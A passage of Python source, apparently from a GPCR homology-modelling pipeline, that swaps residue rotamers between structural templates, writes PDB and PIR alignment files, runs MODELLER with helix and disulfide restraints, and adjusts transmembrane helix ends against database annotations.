sections: # if self.revise_xtal==False and 'term' in sec[0]: # pass # else: # pass for rot in rot_table: # if self.revise_xtal==False and 'term' in sec[0]: # pass # else: if int(sec[1])<=int(rot[1])<=int(sec[2]): try: bb = rot[4].pdb_code.index except: bb = rot[4] try: rt = rot[5].pdb_code.index except: rt = rot[5] l = "{},{},{},{},{},{}\n".format(rot[0],rot[1],rot[2],rot[3],bb,rt) s_file.write(l) self.template_stats = rot_table # template seq sim file with open(path+modelname+'.template_similarities.csv','w') as s_file: template_list, self.template_list = [], OrderedDict() for r in self.template_stats: if r[4] not in template_list and r[4]!=None: template_list.append(r[4]) if r[5] not in template_list and r[5]!=None: template_list.append(r[5]) s_file.write('Template,Sequence_similarity,Resolution,Representative,State\n') for temp, sim in self.similarity_table_all.items(): if temp in template_list: self.template_list[temp] = sim for t, s in self.template_list.items(): s_file.write('{},{},{},{},{}\n'.format(t.pdb_code.index, s, t.resolution, t.representative, t.state.slug)) if self.debug: print('MODELLER build: ',datetime.now() - startTime) pprint.pprint(self.statistics) print('################################') return self def run_non_conserved_switcher(self, main_pdb_array, reference_dict, template_dict, alignment_dict): ''' Switches non-conserved residues with best possible template. Returns refreshed main_pdb_array (atom coordinates), reference_dict (reference generic numbers and residue ids), template_dict (template generic numbers and residue ids) and alignment_dict (aligned reference and template dictionary). @param main_pdb_array: nested OrderedDict(), output of GPCRDBParsingPDB().pdb_array_creator() @param reference_dict: reference dictionary of AlignedReferenceTemplate. @param template_dict: template dictionary of AlignedReferenceTemplate.o2 @param alignment_dict: alignment dictionary of AlignedReferenceTemplate. ''' atom_num_dict = {'E':9, 'S':6, 'Y':12, 'G':4, 'A':5, 'V':7, 'M':8, 'L':8, 'I':8, 'T':7, 'F':11, 'H':10, 'K':9, 'D':8, 'C':6, 'R':11, 'P':7, 'Q':9, 'N':8, 'W':14, '-':0} parse = GPCRDBParsingPDB() ref_length = 0 conserved_count = 0 non_cons_count = 0 trimmed_res_num = 0 switched_count = 0 non_cons_res_templates, conserved_residues = OrderedDict(), OrderedDict() trimmed_residues = [] inconsistencies = [] if self.revise_xtal==True: ref_prot = self.reference_protein.parent else: ref_prot = self.reference_protein for incons in self.statistics.info_dict['pdb_db_inconsistencies']: inconsistencies.append(list(incons.keys())[0]) for ref_seg, temp_seg, aligned_seg in zip(reference_dict, template_dict, alignment_dict): if len(ref_seg)>4: segment = ref_seg[:4] else: segment = ref_seg for ref_res, temp_res, aligned_res in zip(reference_dict[ref_seg], template_dict[temp_seg], alignment_dict[aligned_seg]): if self.revise_xtal==True and reference_dict[ref_seg][ref_res]!=template_dict[temp_seg][temp_res]: alignment_dict[aligned_seg][aligned_res]='.' if reference_dict[ref_seg][ref_res]!='-': ref_length+=1 else: trimmed_residues.append(ref_res.replace('x','.')) if '?' in temp_res: trimmed_residues.append(ref_res.replace('x','.')) trimmed_res_num+=1 non_cons_count+=1 continue if '-term' in ref_seg and (template_dict[temp_seg][temp_res]=='-' or reference_dict[ref_seg][ref_res]!=template_dict[temp_seg][temp_res] or len(main_pdb_array[ref_seg][ref_res])<atom_num_dict[template_dict[temp_seg][temp_res]]): trimmed_residues.append(ref_res.replace('x','.')) trimmed_res_num+=1 non_cons_count+=1 continue if (ref_res not in inconsistencies and alignment_dict[aligned_seg][aligned_res]!='.' and alignment_dict[aligned_seg][aligned_res]!='x' and alignment_dict[aligned_seg][aligned_res]!='-' and alignment_dict[aligned_seg][aligned_res]!='/' and len(main_pdb_array[ref_seg][ref_res.replace('x','.')])>=atom_num_dict[template_dict[temp_seg][temp_res]]): try: rot_test = Rotamer.objects.filter(structure=self.main_structure, residue__display_generic_number__label=dgn(ref_res, self.main_structure.protein_conformation)) rot_test = self.right_rotamer_select(rot_test) if rot_test.missing_atoms==True: alignment_dict[aligned_seg][aligned_res]='.' template_dict[temp_seg][temp_res]='G' else: raise Exception() except: conserved_residues[ref_res] = alignment_dict[aligned_seg][aligned_res] conserved_count+=1 if 'x' not in ref_res: num_in_loop = parse.gn_num_extract(ref_res,'|')[1] try: this_res = list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug=segment))[num_in_loop-1] except: trimmed_residues.append(ref_res.replace('x','.')) continue seq_num = str(this_res.sequence_number) try: self.update_template_source([seq_num],self.template_source[segment][seq_num][0],segment, just_rot=True) key_in_template_source = seq_num except: self.update_template_source([ggn(this_res.display_generic_number.label)], self.template_source[segment][ggn(this_res.display_generic_number.label)][0], segment,just_rot=True) key_in_template_source = ggn(this_res.display_generic_number.label) else: try: self.update_template_source([ref_res],self.template_source[segment][ref_res][0],segment, just_rot=True) key_in_template_source = ref_res except: missing_i = list(reference_dict[ref_seg].keys()).index(ref_res) gaps_before = [x for x in list(reference_dict[ref_seg].keys())[:missing_i] if reference_dict[ref_seg][x]=='-'] this_loop = Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug=ref_seg[:4]) right_res = str(this_loop[missing_i-len(gaps_before)].sequence_number) self.update_template_source([right_res],self.template_source[segment][right_res][0],segment, just_rot=True) key_in_template_source = right_res if '_dis' in ref_seg or (ref_seg=='ECL2' and self.template_source['ECL2'][key_in_template_source][0]!=self.main_structure and '|' in ref_res): trimmed_residues.append(ref_res.replace('x','.')) gn = ref_res if ((gn in inconsistencies or alignment_dict[aligned_seg][aligned_res]=='.' and reference_dict[ref_seg][gn]!=template_dict[temp_seg][gn]) or (template_dict[temp_seg][temp_res]!='x' and len(main_pdb_array[ref_seg][ref_res.replace('x','.')])<atom_num_dict[template_dict[temp_seg][temp_res]])): non_cons_count+=1 gn_ = str(ref_res).replace('x','.') no_match = True if '|' in gn_: try: list_num = int(gn.split('|')[1])-1 gn = ggn(list(Residue.objects.filter(protein_conformation__protein=ref_prot, protein_segment__slug=ref_seg.split('_')[0]))[list_num].display_generic_number.label) gn_ = gn.replace('x','.') except: pass this_state_structs_with_resi, other_state_structs_with_resi = [],[] main_pdb_array, template_dict, non_cons_res_templates, switched_count, no_match = self.find_and_switch_rotamer(self.similarity_table, gn, gn_, reference_dict, ref_seg, ref_res, main_pdb_array, atom_num_dict, template_dict, temp_seg, temp_res, non_cons_res_templates, switched_count, no_match, segment) if no_match==True: main_pdb_array, template_dict, non_cons_res_templates, switched_count, no_match = self.find_and_switch_rotamer(self.similarity_table_other_states, gn, gn_, reference_dict, ref_seg, ref_res, main_pdb_array, atom_num_dict, template_dict, temp_seg, temp_res, non_cons_res_templates, switched_count, no_match, segment) if no_match==True: try: if 'free' not in ref_seg: residue = main_pdb_array[ref_seg][str(ref_res).replace('x','.')] main_pdb_array[ref_seg][str(ref_res).replace('x','.')] = residue[0:5] trimmed_residues.append(gn_) trimmed_res_num+=1 elif 'free' in ref_seg: trimmed_residues.append(gn_) trimmed_res_num+=1 except: logging.warning("Missing atoms in {} at {}".format(self.main_structure,gn)) elif alignment_dict[aligned_seg][aligned_res]=='x': trimmed_residues.append(gn.replace('x','.')) trimmed_res_num+=1 self.statistics.add_info('ref_seq_length', ref_length) self.statistics.add_info('conserved_num', conserved_count) self.statistics.add_info('non_conserved_num', non_cons_count) self.statistics.add_info('trimmed_residues_num', trimmed_res_num) self.statistics.add_info('non_conserved_switched_num', switched_count) self.statistics.add_info('conserved_residues', conserved_residues) self.statistics.add_info('non_conserved_residue_templates', non_cons_res_templates) return [main_pdb_array, reference_dict, template_dict, alignment_dict, trimmed_residues] def find_and_switch_rotamer(self, similarity_table, gn, gn_, reference_dict, ref_seg, ref_res, main_pdb_array, atom_num_dict, template_dict, temp_seg, temp_res, non_cons_res_templates, switched_count, no_match, segment): parse = GPCRDBParsingPDB() for struct in similarity_table: try: alt_temp = parse.fetch_residues_from_pdb(struct, [gn]) if reference_dict[ref_seg][ref_res]==PDB.Polypeptide.three_to_one( alt_temp[gn_][0].get_parent().get_resname()): orig_res = main_pdb_array[ref_seg][str(ref_res).replace('x','.')] alt_res = alt_temp[gn_] if len(alt_res)!=atom_num_dict[reference_dict[ref_seg][ref_res]]: continue superpose = sp.RotamerSuperpose(orig_res, alt_res) new_atoms = superpose.run() if superpose.backbone_rmsd>0.5: continue main_pdb_array[ref_seg][str(ref_res).replace('x','.')] = new_atoms template_dict[temp_seg][temp_res] = reference_dict[ref_seg][ref_res] non_cons_res_templates[gn] = struct switched_count+=1 no_match = False if 'x' not in ref_res: num_in_loop = parse.gn_num_extract(ref_res,'|')[1] seq_num = str(list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug=segment))[num_in_loop-1].sequence_number) self.update_template_source([seq_num],struct,segment,just_rot=True) else: self.update_template_source([ref_res],struct,segment,just_rot=True) break except: pass return main_pdb_array, template_dict, non_cons_res_templates, switched_count, no_match def ECL3_disulfide(self, reference_dict): c61, c62 = False, False try: if reference_dict['TM6']['6x61']=='C': c61 = True except: pass try: if reference_dict['TM6']['6x62']=='C': c62 = True except: pass ecl3_lab = [i for i in reference_dict if i.startswith('ECL3')][0] ecl3_c = [] for gn, res in reference_dict[ecl3_lab].items(): if res=='C': ecl3_c.append(gn) if c61==True and len(ecl3_c)>0: return ['6x61', ecl3_c[0]] elif c62==True and len(ecl3_c)>0: return ['6x62', ecl3_c[0]] elif len(ecl3_c)>=2: return [ecl3_c[0], ecl3_c[1]] else: return [0,0] def write_homology_model_pdb(self, filename, main_pdb_array, alignment, trimmed_residues=[], disulfide_pairs=[]): ''' Write PDB file from pdb array to file. @param filename: str, filename of output file \n @param main_pdb_array: OrderedDict(), of atoms of pdb, where keys are generic numbers/residue numbers and values are list of atoms. Output of GPCRDBParsingPDB.pdb_array_creator(). @param alignment: AlignedReferenceTemplate class, alignment of reference and template. @trimmed_residues: list, list of generic numbers that are trimmed/to be modeled by MODELLER. ''' key = '' res_num = 0 counter_num = 0 atom_num = 0 trimmed_resi_nums = OrderedDict() helix_restraints = [] prev_seg = '0' icl3_mid = None disulfide_nums = [[0,0],[0,0]] with open(filename,'w+') as f: for seg_id, segment in main_pdb_array.items(): if seg_id!='TM1' and prev_seg!='0' and seg_id.startswith('T') and prev_seg.startswith('T'): atom_num+=1 # f.write("\nTER{} {} {}{}".format(str(atom_num).rjust(8),atom.get_parent().get_resname(),str(self.main_template_preferred_chain)[0],str(res_num).rjust(4))) trimmed_segment = OrderedDict() for key in segment: res_num+=1 counter_num+=1 for i, d_p in enumerate(disulfide_pairs): for j, d in enumerate(d_p): try: if key==d.replace('x','.'): disulfide_nums[i][j] = res_num break except: pass try: if alignment.reference_dict[seg_id][key.replace('.','x')] in ['-','x'] or alignment.reference_dict[seg_id][key] in ['-','x']: counter_num-=1 res_num-=1 continue except: pass if segment[key]=='/': atom_num+=1 # f.write("\nTER{} {} {}{}".format(str(atom_num).rjust(8),atom.get_parent().get_resname(),str(self.main_template_preferred_chain)[0],str(res_num).rjust(4))) icl3_mid = counter_num res_num-=1 counter_num-=1 continue if key in trimmed_residues: trimmed_segment[key] = counter_num if 'x' in segment[key]: if '?' in key: atom_num+=1 # f.write("\nTER{} {} {}{}".format(str(atom_num).rjust(8),atom.get_parent().get_resname(),str(self.main_template_preferred_chain)[0],str(res_num).rjust(4))) continue else: helix_restraints.append(counter_num) continue if 'x' in segment[key]: atom_num+=1 # f.write("\nTER{} {} {}{}".format(str(atom_num).rjust(8),atom.get_parent().get_resname(),str(self.main_template_preferred_chain)[0],str(res_num).rjust(4))) continue if '?' in key and '-' in segment[key]: atom_num+=1 # f.write("\nTER{} {} {}{}".format(str(atom_num).rjust(8),atom.get_parent().get_resname(),str(self.main_template_preferred_chain)[0],str(res_num).rjust(4))) continue if '-term' in seg_id and segment[key]=='-': continue if len(key.split('.'))==3 and segment[key]=='-': atom_num+=1 continue for atom in main_pdb_array[seg_id][key]: atom_num+=1 coord = list(atom.get_coord()) coord1 = "%8.3f"% (coord[0]) coord2 = "%8.3f"% (coord[1]) coord3 = "%8.3f"% (coord[2]) if str(atom.get_id())=='CA': if len(key)==4: bfact = "%6.2f"% (float(key)) elif '.' not in key: bfact = "%6.2f"% (float(atom.get_bfactor())) else: key_split = key.split('.') if '.' in key and len(key_split[1])==3: bfact = " -%4.2f"% (float(key)) elif len(key_split)==3: bfact = "%6.2f"% (float(atom.get_bfactor())) else: bfact = " %5.2f"% (float(key)) else: bfact = "%6.2f"% (float(atom.get_bfactor())) occupancy = "%6.2f"% (atom.get_occupancy()) template=""" ATOM{atom_num} {atom}{res} {chain}{res_num}{coord1}{coord2}{coord3}{occupancy}{bfactor}{atom_s} """ context={"atom_num":str(atom_num).rjust(7), "atom":str(atom.get_id()).ljust(4), "res":atom.get_parent().get_resname(), "chain":str(self.main_template_preferred_chain)[0], "res_num":str(res_num).rjust(4), "coord1":coord1.rjust(12), "coord2":coord2.rjust(8), "coord3":coord3.rjust(8), "occupancy":str(occupancy).rjust(3), "bfactor":str(bfact).rjust(4), "atom_s":str(str(atom.get_id())[0]).rjust(12)} f.write(template.format(**context)) trimmed_resi_nums[seg_id] = trimmed_segment prev_seg = seg_id[:4] f.write("\nTER\n") if self.reference_entry_name!=self.main_structure.protein_conformation.protein.parent.entry_name: atom_num+=1 # f.write("\nTER{} {} {}{}".format(str(atom_num).rjust(8),atom.get_parent().get_resname(),str(self.main_template_preferred_chain)[0],str(res_num).rjust(4))) return trimmed_resi_nums, helix_restraints, icl3_mid, disulfide_nums def create_PIR_file(self, reference_dict, template_dict, template_file, hetatm_count, water_count): ''' Create PIR file from reference and template alignment (AlignedReferenceAndTemplate). @param reference_dict: AlignedReferenceAndTemplate.reference_dict @param template_dict: AlignedReferenceAndTempalte.template_dict @template_file: str, name of template file with path @param hetatm_count: int, number of hetero atoms @param water_count: int, number of water atoms ''' ref_sequence, temp_sequence = '','' res_num = 1 with open(template_file,'r') as f: lines = f.readlines() for line in lines: try: pdb_re = re.search('(ATOM[A-Z\s\d]{13}\S{3}\s\S\s+)(\d+)([A-Z\s\d.-]{49,53})',line) start_num = pdb_re.group(2) break except: try: pdb_re = re.search('(ATOM[A-Z\s\d]{13}\S{3}\s+)(\d+)([A-Z\s\d.-]{49,53})',line) start_num = pdb_re.group(2) break except: pass for ref_seg, temp_seg in zip(reference_dict, template_dict): if ref_seg=='HN': ref_sequence+='/' temp_sequence+='/' for ref_res, temp_res in zip(reference_dict[ref_seg], template_dict[temp_seg]): if reference_dict[ref_seg][ref_res] in ['-','x']: if ref_seg in ['HN', 'hns1', 'S1', 's1h1', 'H1', 'h1ha', 'HA', 'hahb', 'HB', 'hbhc', 'HC', 'hchd', 'HD', 'hdhe', 'HE', 'hehf', 'HF', 'hfs2', 'S2', 's2s3', 'S3', 's3h2', 'H2', 'h2s4', 'S4', 's4h3', 'H3', 'h3s5', 'S5', 's5hg', 'HG', 'hgh4', 'H4', 'h4s6', 'S6', 's6h5', 'H5']: res_num+=1 continue else: ref_sequence+=reference_dict[ref_seg][ref_res] if template_dict[temp_seg][temp_res] in ['-','x']: temp_sequence+='-' else: temp_sequence+=template_dict[temp_seg][temp_res] res_num+=1 for i in range(hetatm_count): ref_sequence+='.' temp_sequence+='.' for i in range(water_count): ref_sequence+='w' temp_sequence+='w' self.model_sequence = temp_sequence with open("./structure/PIR/"+self.uniprot_id+"_"+self.state+".pir", 'w+') as output_file: template=""" >P1;{temp_file} structure:{temp_file}:{start}:{chain}:{res_num}:{chain}:::: {temp_sequence}* >P1;{uniprot} sequence:{uniprot}:::::::: {ref_sequence}* """ context={"temp_file":template_file, "start":start_num, "chain":self.main_template_preferred_chain, "res_num":res_num, "temp_sequence":temp_sequence, "uniprot":self.uniprot_id, "ref_sequence":ref_sequence} output_file.write(template.format(**context)) def run_MODELLER(self, pir_file, template, reference, number_of_models, output_file_name, atom_dict=None, helix_restraints=[], icl3_mid=None, disulfide_nums=[]): ''' Build homology model with MODELLER. @param pir_file: str, file name of PIR file with path \n @param template: str, file name of template with path \n @param reference: str, Uniprot code of reference sequence \n @param number_of_models: int, number of models to be built \n @param output_file_name: str, name of output file @param atom_dict: nested OrderedDict(), atoms to model with MODELLER organized by segments and generic numbers, default=None @param helix_restraints: list, list of generic numbers that should be modelled as helical regions by MODELLER, default=[] @param icl3_mid: int, position of the break in the middle of ICL3, default=None ''' log.none() env = environ(rand_seed=1028) #!!random number generator if self.revise_xtal==True: ref_prot = self.reference_protein.parent else: ref_prot = self.reference_protein if ref_prot==self.main_structure.protein_conformation.protein.parent: env.io.hetatm = True env.io.water = True if atom_dict==None: a = automodel(env, alnfile = pir_file, knowns = template, sequence = reference, assess_methods=(assess.DOPE)) else: a = HomologyMODELLER(env, alnfile = pir_file, knowns = template, sequence = reference, assess_methods=(assess.DOPE), atom_selection=atom_dict, helix_restraints=helix_restraints, icl3_mid=icl3_mid, disulfide_nums=disulfide_nums) a.starting_model = 1 a.ending_model = number_of_models a.md_level = refine.slow path = "./structure/homology_models/" if not os.path.exists(path): os.mkdir(path) a.make() # Get a list of all successfully built models from a.outputs ok_models = [x for x in a.outputs if x['failure'] is None] if len(ok_models)==0: os.rename("./"+template, output_file_name) return 0 # Rank the models by DOPE score key = 'DOPE score' if sys.version_info[:2] == (2,3): # Python 2.3's sort doesn't have a 'key' argument ok_models.sort(lambda a,b: cmp(a[key], b[key])) else: ok_models.sort(key=lambda a: a[key]) # Get top model m = ok_models[0] # print("Top model: %s (DOPE score %.3f)" % (m['name'], m[key])) for file in os.listdir("./"): if file==m['name']: os.rename("./"+file, output_file_name) elif file.startswith(self.uniprot_id): os.remove("./"+file) class SilentModeller(object): ''' No text to console. ''' def __enter__(self): self._stdout = sys.stdout sys.stdout = open(os.devnull, 'w') def __exit__(self, *args): sys.stdout.close() sys.stdout = self._stdout class HomologyMODELLER(automodel): def __init__(self, env, alnfile, knowns, sequence, assess_methods, atom_selection, helix_restraints=[], icl3_mid=None, disulfide_nums=[]): super(HomologyMODELLER, self).__init__(env, alnfile=alnfile, knowns=knowns, sequence=sequence, assess_methods=assess_methods) self.atom_dict = atom_selection self.helix_restraints = helix_restraints self.icl3_mid = icl3_mid self.disulfide_nums = disulfide_nums def identify_chain(self, seq_num): if len(self.chains)==2: if self.icl3_mid==None: return 'A' elif seq_num<self.icl3_mid: return 'A' elif seq_num>=self.icl3_mid: return 'B' else: return '' else: return '' def find_helix_restraints(self): start = 0 prev = 0 out = [] for i in self.helix_restraints: if prev==0: start = i if i==prev+1: pass elif prev!=0: out.append([start,prev]) start = i prev=i if len(self.helix_restraints)>0: out.append([start,prev]) return out def select_atoms(self): selection_out = [] for seg_id, segment in self.atom_dict.items(): for gn, atom in segment.items(): chain = self.identify_chain(atom) selection_out.append(self.residues[str(atom)+':{}'.format(chain)]) return selection(selection_out) def special_restraints(self, aln): rsr = self.restraints for i in self.find_helix_restraints(): chain = self.identify_chain(i[0]) for j, k in self.atom_dict.items(): segment = sorted(list(k.items()),key=lambda e: e[0]) if segment==[]: continue if j=='H8' and i[0]==segment[0][1] and i[1]==segment[-1][1]: rsr.add(secondary_structure.alpha(self.residue_range('{}:{}'.format(i[0]-4,chain),'{}:{}'.format(i[1],chain)))) break elif i[0]==segment[0][1]: rsr.add(secondary_structure.alpha(self.residue_range('{}:{}'.format(i[0],chain),'{}:{}'.format(i[1]+4,chain)))) break elif i[1]==segment[-1][1]: rsr.add(secondary_structure.alpha(self.residue_range('{}:{}'.format(i[0]-4,chain),'{}:{}'.format(i[1],chain)))) break def special_patches(self, aln): for d in self.disulfide_nums: if d[0]==0: continue try: self.patch(residue_type='DISU', residues=(self.residues[str(d[0])], self.residues[str(d[1])])) except: pass # def make(self): # with SilentModeller(): # super(HomologyMODELLER, self).make() class SegmentEnds(object): def __init__(self): self.start = None self.end = None self.protein_segment = None def __repr__(self): return "<{},{},{}>".format(self.start,self.end,self.protein_segment) class HelixEndsModeling(HomologyModeling): ''' Class for modeling the helix ends of GPCRs. ''' def __init__(self, similarity_table, template_source, main_structure): self.helix_ends = OrderedDict() self.helix_end_mods = OrderedDict() self.main_pdb_array = OrderedDict() self.alignment = OrderedDict() self.similarity_table = similarity_table self.template_source = template_source self.main_structure = main_structure self.templates_to_skip = OrderedDict([('TM1',[[],[]]),('TM2',[[],[]]),('TM3',[[],[]]),('TM4',[[],[]]), ('TM5',[[],[]]),('TM6',[[],[]]),('TM7',[[],['5UNF','5UNG','5UNH']]),('H8',[[],[]])]) def find_ends(self, structure, protein_conformation): raw_res = Residue.objects.filter(protein_conformation=protein_conformation).exclude( protein_segment=None).order_by('protein_segment_id').distinct('protein_segment_id') raw_segs = [i.protein_segment for i in raw_res] ends = [] for i in raw_segs: if i.slug[0] not in ['T','H']: continue end = SegmentEnds() end.start = list(Residue.objects.filter(protein_conformation=protein_conformation, protein_segment__slug=i))[0].sequence_number end.end = list(Residue.objects.filter(protein_conformation=protein_conformation, protein_segment__slug=i))[-1].sequence_number end.protein_segment = i ends.append([end, structure]) return ends def fetch_struct_helix_ends_from_db(self, structure, H8_alt=None): ''' Returns structure's helix end generic numbers after updating them with annotated data. ''' raw = self.find_ends(structure, structure.protein_conformation) anno_conf = ProteinConformation.objects.get(protein=structure.protein_conformation.protein.parent) annotated = self.find_ends(structure, anno_conf) if H8_alt!=None and H8_alt!=structure: H8_raw_conf = ProteinConformation.objects.get(protein=H8_alt.protein_conformation.protein.parent) if raw[-1][0].protein_segment.slug=='H8': try: raw[-1] = [i for i in self.find_ends(H8_alt,H8_raw_conf) if i[0].protein_segment.slug=='H8'][0] except: pass else: try: raw.append([i for i in self.find_ends(H8_alt,H8_raw_conf) if i[0].protein_segment.slug=='H8'][0]) except: pass if annotated!=[]: if annotated[-1][0].protein_segment.slug=='H8': try: annotated[-1] = [i for i in self.find_ends( H8_alt,H8_alt.protein_conformation) if i[0].protein_segment.slug=='H8'][0] except: pass else: try: annotated.append([i for i in self.find_ends( H8_alt,H8_alt.protein_conformation) if i[0].protein_segment.slug=='H8'][0]) except: pass ends = OrderedDict() for i in raw: if i[0].protein_segment.slug[0]=='T' or i[0].protein_segment.slug=='H8': if len(list(Residue.objects.filter(protein_conformation=i[1].protein_conformation, protein_segment=i[0].protein_segment)))==0: continue start_found = False break_point = 0 while start_found==False: if break_point==20: i[0].start = None break try: if Residue.objects.get(protein_conformation=i[1].protein_conformation, sequence_number=i[0].start).generic_number==None: i[0].start+=1 else: start_found = True except: break_point+=1 i[0].start+=1 s = Residue.objects.get(protein_conformation=i[1].protein_conformation,sequence_number=i[0].start) end_found = False break_point = 0 while end_found==False: if break_point==20: i[0].end = None break try: if Residue.objects.get(protein_conformation=i[1].protein_conformation, sequence_number=i[0].end).generic_number==None: i[0].end-=1 else: end_found = True except: break_point+=1 i[0].end-=1 e = Residue.objects.get(protein_conformation=i[1].protein_conformation,sequence_number=i[0].end) ends[s.protein_segment.slug] = [ggn(s.display_generic_number.label),ggn(e.display_generic_number.label)] for j in annotated: if j[0].protein_segment.slug[0]=='T' or j[0].protein_segment.slug=='H8': if j[0].start!=0: found_start = False break_point = 0 while found_start==False: if break_point==20: j[0].start = None break try: if Residue.objects.get(protein_conformation=j[1].protein_conformation, sequence_number=j[0].start).generic_number!=None: found_start = True else: raise Exception() except: break_point+=1 j[0].start+=1 if j[0].start!=None: sa = Residue.objects.get(protein_conformation=j[1].protein_conformation,sequence_number=j[0].start) ends[j[0].protein_segment.slug][0] = ggn(sa.display_generic_number.label) if j[0].end!=0: found_end = False break_point = 0 while found_end==False: if break_point==20: j[0].end = None break try: if Residue.objects.get(protein_conformation=j[1].protein_conformation, sequence_number=j[0].end).generic_number!=None: found_end = True else: raise Exception() except: break_point+=1 j[0].end-=1 if j[0].end!=None: ea = Residue.objects.get(protein_conformation=j[1].protein_conformation,sequence_number=j[0].end) try: ends[j[0].protein_segment.slug][1] = ggn(ea.display_generic_number.label) except: pass return ends def fetch_struct_helix_ends_from_array(self, array): ''' Returns helix ends from structure array (GPCRDBParsingPDB.pdb_array_creator()). ''' ends = OrderedDict() for seg_lab, seg in array.items(): if seg_lab[0]=='T' or seg_lab=='H8': try: ends[seg_lab] = [list(seg.keys())[0].replace('.','x'),list(seg.keys())[-1].replace('.','x')] except: pass return ends def correct_helix_ends(self, main_structure, main_pdb_array, a, template_source, separate_H8=None): ''' Updates main template structure with annotated helix ends. If helix is too long, it removes residues, if it is too short, it superpositions residues from next closest template. Updates alignment with changes. ''' modifications = {'added':{'TM1':[[],[]],'TM2':[[],[]],'TM3':[[],[]],'TM4':[[],[]],'TM5':[[],[]],'TM6':[[],[]], 'TM7':[[],[]], 'H8':[[],[]]}, 'removed':{'TM1':[[],[]],'TM2':[[],[]],'TM3':[[],[]],'TM4':[[],[]],'TM5':[[],[]],'TM6':[[],[]], 'TM7':[[],[]], 'H8':[[],[]]}} try: H8_alt = template_source['H8']['8x50'][0] if separate_H8==True: raise Exception() except: H8_alt = None raw_helix_ends = self.fetch_struct_helix_ends_from_array(main_pdb_array) anno_helix_ends = self.fetch_struct_helix_ends_from_db(main_structure, H8_alt) # Force active state with main template 5UNF, 5UNG or 5UNH to get new TM7 end skip_template = False if separate_H8 and main_structure.pdb_code.index in ['5UNF','5UNG','5UNH']: anno_helix_ends['TM7'][1] = '7x48' skip_template = True for lab,seg in a.template_dict.items(): if separate_H8==True: if lab=='H8': continue elif separate_H8==False: if lab!='H8': continue for gn,res in seg.items(): try: if lab[0] in ['H']: if res!='-': r = Residue.objects.get(protein_conformation=H8_alt.protein_conformation, display_generic_number__label=dgn( gn,H8_alt.protein_conformation)) if len(Rotamer.objects.filter(structure=H8_alt,residue=r))<1: raise Exception() except: a.template_dict[lab][gn] = 'x' a.alignment_dict[lab][gn] = 'x' parser = GPCRDBParsingPDB() for raw_seg, anno_seg in zip(raw_helix_ends, anno_helix_ends): if separate_H8==True: if raw_seg=='H8': continue elif separate_H8==False: if raw_seg!='H8': continue if H8_alt!=None and H8_alt!=main_structure and raw_seg=='H8': template = H8_alt else: template = main_structure protein_conf = ProteinConformation.objects.get(protein=template.protein_conformation.protein.parent) try: s_dif = parser.gn_comparer(raw_helix_ends[raw_seg][0],anno_helix_ends[anno_seg][0], protein_conf) except: try: s_dif = parser.gn_comparer(raw_helix_ends[raw_seg][0],anno_helix_ends[anno_seg][0], template.protein_conformation) protein_conf = template.protein_conformation except: for i in range(int(raw_helix_ends[raw_seg][0].split('x')[1]), int(anno_helix_ends[anno_seg][0].split('x')[1])): a.template_dict[raw_seg]['8x{}'.format(str(i))]='x' a.alignment_dict[raw_seg]['8x{}'.format(str(i))]='x' s_dif=0 if s_dif<0: s_gn = Residue.objects.get(protein_conformation=protein_conf, display_generic_number__label=dgn(raw_helix_ends[raw_seg][0], protein_conf)) seq_nums = [i for i in range(s_gn.sequence_number,s_gn.sequence_number-s_dif)] gns = [ggn(j.display_generic_number.label) for j in list(Residue.objects.filter( protein_conformation=protein_conf, sequence_number__in=seq_nums))] for gn in gns: if gn in a.template_dict[raw_seg]: a.template_dict[raw_seg][gn]='x' a.alignment_dict[raw_seg][gn]='x' else: del main_pdb_array[raw_seg][gn.replace('x','.')] modifications['removed'][raw_seg][0].append(gn) protein_conf = ProteinConformation.objects.get(protein=template.protein_conformation.protein.parent) try: e_dif = parser.gn_comparer(raw_helix_ends[raw_seg][1],anno_helix_ends[anno_seg][1], protein_conf) except: try: e_dif = parser.gn_comparer(raw_helix_ends[raw_seg][1],anno_helix_ends[anno_seg][1], template.protein_conformation) protein_conf = template.protein_conformation except: for i in range(int(anno_helix_ends[anno_seg][1].split('x')[1])+1, int(raw_helix_ends[raw_seg][1].split('x')[1])+1): a.template_dict[raw_seg]['8x{}'.format(str(i))]='x' a.alignment_dict[raw_seg]['8x{}'.format(str(i))]='x' e_dif = 0 if e_dif>0: e_gn = Residue.objects.get(protein_conformation=protein_conf, display_generic_number__label=dgn(raw_helix_ends[raw_seg][1], protein_conf)) seq_nums = [i for i in range(e_gn.sequence_number-e_dif+1,e_gn.sequence_number+1)] gns = [ggn(j.display_generic_number.label) for j in list(Residue.objects.filter( protein_conformation=protein_conf, sequence_number__in=seq_nums))] for gn in gns: a.template_dict[raw_seg][gn]='x' a.alignment_dict[raw_seg][gn]='x' try: a.reference_dict[raw_seg][gn] except: a.reference_dict[raw_seg][gn]='x' self.helix_ends = raw_helix_ends for ref_seg, temp_seg, align_seg in zip(a.reference_dict, a.template_dict, a.alignment_dict): if separate_H8==True: if ref_seg=='H8': continue elif separate_H8==False: if ref_seg!='H8': continue if ref_seg=='H8' and H8_alt!=None: first_res = Residue.objects.get(protein_conformation=H8_alt.protein_conformation, display_generic_number__label=dgn(raw_helix_ends[ref_seg][0], H8_alt.protein_conformation)).sequence_number for h in list(a.template_dict[temp_seg].keys())[::-1]: if a.template_dict[temp_seg][h]!='x': raw_helix_ends[ref_seg][1]=h break last_res = Residue.objects.get(protein_conformation=H8_alt.protein_conformation, display_generic_number__label=dgn(raw_helix_ends[ref_seg][1], H8_alt.protein_conformation)).sequence_number temp_seg_seq_len = len(list(Residue.objects.filter(protein_conformation=H8_alt.protein_conformation, sequence_number__in=range(first_res,last_res+1)))) mid = temp_seg_seq_len/2 elif ref_seg[0]=='T': first_res = Residue.objects.get(protein_conformation=main_structure.protein_conformation, display_generic_number__label=dgn(raw_helix_ends[ref_seg][0], main_structure.protein_conformation)).sequence_number last_res = Residue.objects.get(protein_conformation=main_structure.protein_conformation, display_generic_number__label=dgn(raw_helix_ends[ref_seg][1], main_structure.protein_conformation)).sequence_number temp_seg_seq_len = len(list(Residue.objects.filter(protein_conformation=main_structure.protein_conformation, sequence_number__in=range(first_res,last_res+1)))) mid = temp_seg_seq_len/2 if ref_seg[0] not in ['T','H']: continue if separate_H8==True: if ref_seg=='H8': continue elif separate_H8==False: if ref_seg!='H8': continue offset = 0 increase_offset = True full_template_dict_seg = deepcopy(a.template_dict[temp_seg]) delete_r = set() delete_t = set() 